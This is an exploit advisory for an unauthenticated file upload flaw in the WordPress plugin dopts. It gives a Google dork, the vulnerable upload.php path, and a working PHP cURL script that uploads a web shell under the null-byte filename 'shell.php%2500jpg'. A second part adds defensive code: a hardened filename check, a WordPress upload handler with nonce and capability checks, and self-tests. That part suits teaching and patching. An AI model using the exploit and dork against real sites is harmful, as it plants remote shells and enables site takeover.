WordPress plugin dopts file upload vulnerability

2017.05.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################################
# Exploit Title: WordPress plugin dopts file upload vulnerability
# Author : sohaip-hackerDZ
# Google Dork : inurl:/wp-content/plugins/dopts/
# Tested on : Linux
# Date : 2017-05-24
# Blog : http://www.tools-hack.com/
#################################################################################
#
# if msg : error
#
# [!] Exploit : 127.0.0.1/path/wp-content/plugins/dopts/libraries/php/upload.php
#
# [!] File Location : http://127.0.0.1/path/wp-content/uploads/SHELL.php%205jpg
#
# [*] OR http://127.0.0.1/path/wp-content/plugins/dopts/uploads/SHELL.php%205jpg
#
# [!] Exploit :
##################################################################################
<?php
// Unauthenticated multipart POST to the plugin's upload.php. The original used the
// legacy "@shell.php%2500jpg" prefix syntax, which PHP 7 removed; CURLFile posts the
// local file shell.php under the same crafted filename on any supported PHP.
$postData = array();
$postData['file'] = new CURLFile('shell.php', 'application/octet-stream', 'shell.php%2500jpg');
$sohaip = curl_init();
curl_setopt($sohaip, CURLOPT_URL, "http://[target].com/wp-content/plugins/dopts/libraries/php/upload.php");
curl_setopt($sohaip, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0)");
curl_setopt($sohaip, CURLOPT_POST, 1);
curl_setopt($sohaip, CURLOPT_POSTFIELDS, $postData);
// Echo the server response so the "error" / success message can be inspected.
$dz = curl_exec($sohaip);
curl_close($sohaip);
unset($sohaip);
echo $dz;
?>
#################################################################################
# ABOUT
# Facebook : https://www.facebook.com/sohaipbarika
# forum : http://spyhackerz.com/forum/
# Blog : http://www.tools-hack.com/
#################################################################################
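The advisory's crafted filename "shell.php%2500jpg" is aimed at an upload handler that only looks at the tail of the client-supplied name. The block below is an added example, not code from the dopts plugin or from the advisory's author: it puts a naive suffix-only check of that kind next to a normalised allow-list check, then shows how the same upload should be handled inside WordPress with core APIs. The function names, the allow-list, the upload directory, the hypothetical nonce action "dopts_upload" and the test filenames are all assumptions.

```php
<?php
// Added example, not the plugin's code. Contrasts a naive suffix check with a
// normalised allow-list check and a WordPress-native handler. Names, the allow-list,
// the upload directory and the nonce action "dopts_upload" are assumptions.

declare(strict_types=1);

const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png', 'gif' => 'image/gif'];

// Vulnerable pattern (hypothetical): trust the client name and look only at its tail.
// "shell.php%2500jpg" ends in "jpg", so it passes although ".php" is in the name.
function naive_allowed(string $clientName): bool
{
    return (bool) preg_match('/(jpg|jpeg|png|gif)$/i', $clientName);
}

// Hardened check: decode once, reject percent signs, NUL/control bytes and path
// separators, require exactly one extension, and compare against the allow-list.
function strict_allowed(string $clientName): bool
{
    $name = urldecode($clientName);                  // "%2500" -> "%00", "%00" -> "\0"
    if ($name === '' || preg_match('/[\x00-\x1f\x7f%\/\\\\]/', $name)) {
        return false;                                // still encoded, NUL, or a path
    }
    $base = basename($name);
    if (substr_count($base, '.') !== 1) {            // "shell.php.jpg" is refused
        return false;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED);
}

// Store an upload under a server-chosen name once the content type agrees with the
// extension; the client-supplied string never reaches the filesystem.
function store_upload(string $tmpPath, string $clientName, string $uploadDir): ?string
{
    if (!is_uploaded_file($tmpPath) || !strict_allowed($clientName)) {
        return null;
    }
    $ext  = strtolower(pathinfo(urldecode($clientName), PATHINFO_EXTENSION));
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($tmpPath, $dest) ? $dest : null;
}

// Inside WordPress the same rules come from core: demand a capability and a nonce,
// then let wp_handle_upload() (which applies sanitize_file_name(), stripping "%" and
// NUL, and wp_check_filetype_and_ext()) accept or reject the file.
function dopts_example_upload_handler(): void
{
    check_ajax_referer('dopts_upload', 'nonce');
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload($_FILES['file'], [
        'test_form' => false,
        'mimes'     => ['jpg|jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'],
    ]);
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 400);
    }
    wp_send_json_success(['url' => $result['url']]);
}

// Self-check when run from the command line outside WordPress (php this_file.php).
if (PHP_SAPI === 'cli' && !function_exists('wp_handle_upload')) {
    $expect = function (bool $cond, string $what): void {
        if (!$cond) { throw new RuntimeException("failed: $what"); }
    };
    $expect(naive_allowed('shell.php%2500jpg') === true,   'naive check passes the advisory name');
    $expect(strict_allowed('shell.php%2500jpg') === false, 'strict check rejects it');
    $expect(strict_allowed("shell.php\0jpg") === false,    'raw NUL rejected');
    $expect(strict_allowed('shell.php.jpg') === false,     'double extension rejected');
    $expect(strict_allowed('photo.JPG') === true,          'plain image accepted');
    echo "checks ok\n";
}
```

The name check alone is not enough: pair it with a web-server rule that refuses to execute scripts under wp-content/uploads, because on Apache with an `AddHandler` for `.php` mod_mime honours every extension in a name, so a stored `shell.php.jpg` would still run as PHP. The unauthenticated reachability of upload.php is the other half of the finding; the WordPress handler above closes it with a nonce and an `upload_files` capability check before any file is touched.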

References:

http://www.tools-hack.com/2017/05/exploit-rce-wordpress-shell-upload-2018.html


Copyright 2024, cxsecurity.com